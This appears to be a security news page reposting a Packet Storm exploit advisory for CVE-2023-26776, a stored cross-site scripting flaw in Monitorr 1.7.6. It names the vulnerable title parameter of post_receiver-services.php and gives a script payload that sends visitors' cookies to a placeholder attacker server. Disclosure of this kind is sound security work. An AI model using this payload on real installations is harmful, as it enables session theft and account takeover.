Security
Headlines
HeadlinesLatestCVEs

Headline

Monitorr 1.7.6 Cross Site Scripting

Monitorr version 1.7.6 suffers from a cross site scripting vulnerability.

Packet Storm
#xss#vulnerability#ubuntu#git#php#auth
# Exploit Title: Monitorr v1.7.6 - Cross Site Scripting# CVE: CVE-2023-26776# Exploit Author: Achuth V P (retrymp3)# Date: February 09, 2023# Vendor Homepage: https://github.com/Monitorr/# Software Link: https://github.com/Monitorr/Monitorr# Tested on: Ubuntu# Version: v1.7.6# Exploit Description:  Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.Attacker can create a service configuration at <base-url>/assets/php/post_receiver-services.php with the title of the service being something like; <script>document.location="<your-server>?cookie="document.cookie</script> or just <script>document.cookie</script>The injected script tag is executed everytime the home page is loaded.

Related news

CVE-2023-26776

Cross Site Scripting vulnerability found in Monitorr v.1.7.6 allows a remote attacker to execute arbitrary code via the title parameter of the post_receiver-services.php file.

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution